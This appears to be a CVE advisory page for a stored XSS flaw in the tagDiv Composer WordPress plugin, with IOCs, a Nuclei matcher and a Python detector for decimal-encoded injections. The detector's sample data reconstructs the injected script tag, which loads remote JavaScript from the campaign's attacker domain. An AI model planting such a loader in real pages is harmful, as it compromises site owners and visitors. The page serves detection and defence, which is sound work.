cbcvebase.
CVE-2023-3169
published 2023-09-11

CVE-2023-3169: The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST…

Priority: P179 (medium)
CVSS 3.1: 6.1 (AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N)
In the wild: exploited (VulnCheck KEV)
EPSS: 1.59% (72.7th percentile)
The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

Affected

3 ranges, as listed by the page's aggregated sources. Only the tagdiv_composer row matches the description above; the chrome and linux_kernel rows look mis-attributed and should not be used to scope this CVE.

Vendor   Product           Version range            Fixed in
google   chrome            (none given)             (none given)
linux    linux_kernel      >= 0 < 5.4.0-144.161     5.4.0-144.161
tagdiv   tagdiv_composer   < 4.2                    4.2

Detection & IOCs (extracted from sources)

url       https://stay.decentralappps[.]com/src/page.js
domain    stay.decentralappps[.]com
domain    promsmotion[.]com
filename  wp-zexit.php
path      /tmp/i
path      404.php
nuclei matchers (HTTP matcher block from the referenced Nuclei template; this is not a Sigma rule)
matchers-condition: and
matchers:
- type: word
  part: body
  words:
  - 'tdw-css-placeholder">console.log({{string}})'

- type: word
  part: content_type
  words:
  - 'text/html'

- type: status
  status:
  - 200
  • Look for malicious script injected inside specific HTML tags; the obfuscated injection is stored in the wp_options table of the WordPress database.
  • Detect the Nuclei probe fingerprint: a GET request to the REST route that returns HTTP 200 with content-type text/html and a body containing 'tdw-css-placeholder">console.log(' confirms the XSS injection point.
  • Injected scripts use decimal-encoded ASCII obfuscation; decoding the character codes reveals the payload URL stay.decentralappps[.]com/src/page.js.
  • Presence of the wp-zexit plugin, which mimics WordPress admin behaviour and hides a backdoor in the site's Ajax interface, is a strong post-exploitation indicator.
  • Monitor for creation of new WordPress administrator accounts with auto-generated usernames derived from the site's hostname, or the legacy username 'greeceman'.
  • The vulnerability exists only in tagDiv Composer versions before 4.2; upgrading to 4.2 or later remediates the unauthenticated stored XSS via the unprotected REST route.
  • Attack waves evolved rapidly, with increasing randomization across injected scripts, URLs and codes, so exact-string IOC matching becomes less reliable over time; prefer the structural checks above (the decimal-encoding pattern, the probe fingerprint, the wp-zexit plugin) to fixed strings.
  • The Nuclei detection template first checks for an empty-body JSON 200 response on the REST route before proceeding to the XSS reflection check; both conditions must be met.
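The two detection ideas in the list above (the Nuclei response fingerprint, and decoding the decimal-encoded ASCII injection found in wp_options) as one runnable script. This is an added example written for this page, not code from the Nuclei template, tagDiv or any of the page's sources. It reproduces only the visible matcher block (status 200, text/html, marker in body); the template's first-stage "empty-body JSON 200" check is not modelled. The wp_options rows, the option name tdw_custom_css, the String.fromCharCode wrapper and the HTTP response are constructed samples; the decoder deliberately does not depend on that wrapper, it decodes any long run of comma-separated printable byte values, which is why it also survives the randomization the last bullet warns about.

```python
import re
from typing import Iterable, List

# Fixed prefix of the Nuclei matcher string on the page. The {{string}} part is a
# per-scan random token, so a detector can only match on the literal prefix.
PROBE_MARKER = 'tdw-css-placeholder">console.log('


def nuclei_probe_matches(status: int, content_type: str, body: str) -> bool:
    """Mirror the page's matcher block (matchers-condition: and):
    HTTP 200, a text/html content-type, and the marker present in the body."""
    return (
        status == 200
        and "text/html" in content_type.lower()
        and PROBE_MARKER in body
    )


# A run of at least 8 comma-separated 2-3 digit numbers. The wrapper around the
# numbers (String.fromCharCode(...), an array literal, ...) is irrelevant.
_DECIMAL_RUN = re.compile(r"(?:\d{2,3}\s*,\s*){7,}\d{2,3}")
_URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_decimal_runs(blob: str, min_len: int = 8) -> List[str]:
    """Decode every run of >= min_len decimal byte values that is entirely
    printable ASCII (32..126). Non-printable runs are ignored as noise."""
    decoded = []
    for m in _DECIMAL_RUN.finditer(blob):
        codes = [int(x) for x in re.split(r"\s*,\s*", m.group(0))]
        if len(codes) >= min_len and all(32 <= c <= 126 for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def defang(host: str) -> str:
    """Render a host the way the IOC list above does (dots bracketed)."""
    return host.replace(".", "[.]")


def extract_hosts(text: str) -> List[str]:
    """Defanged, de-duplicated hostnames from any http(s) URLs in text."""
    return sorted({defang(h) for h in _URL_HOST.findall(text)})


def scan_wp_options(rows: Iterable[tuple]) -> List[dict]:
    """rows: (option_name, option_value) pairs as pulled from wp_options.
    Returns one finding per row that carries a decodable decimal-encoded string."""
    findings = []
    for name, value in rows:
        decoded = decode_decimal_runs(value)
        if not decoded:
            continue
        findings.append({
            "option": name,
            "decoded": decoded,
            "hosts": extract_hosts(" ".join(decoded)),
        })
    return findings


# Constructed sample rows (not captured data). The option name is hypothetical;
# the injected value encodes the payload URL from the page's IOC list as decimal
# ASCII, the obfuscation the page describes.
SAMPLE_ROWS = [
    ("siteurl", "https://example.org"),
    ("tdw_custom_css",
     '<script>var s=document.createElement("script");'
     "s.src=String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,121,46,"
     "100,101,99,101,110,116,114,97,108,97,112,112,112,115,46,99,111,109,47,"
     "115,114,99,47,112,97,103,101,46,106,115);document.head.appendChild(s)</script>"),
]

# Constructed HTTP response of the shape the Nuclei matcher fires on.
SAMPLE_RESPONSE = (
    200,
    "text/html; charset=UTF-8",
    '<div class="tdw-css-placeholder">console.log(q7x2k9)</div>',
)

if __name__ == "__main__":
    print("probe fingerprint matches:", nuclei_probe_matches(*SAMPLE_RESPONSE))
    for finding in scan_wp_options(SAMPLE_ROWS):
        print(finding["option"], "->", finding["decoded"], finding["hosts"])
```

On a live site, feed scan_wp_options with the output of a query such as `SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%,%,%,%,%,%,%,%'` and review every finding by hand; the decoder tells you what the blob says, not whether it is malicious.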

CVSS provenance

nvd        v3.1  6.1  MEDIUM  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv              5.5  MEDIUM
vulncheck        6.1  MEDIUM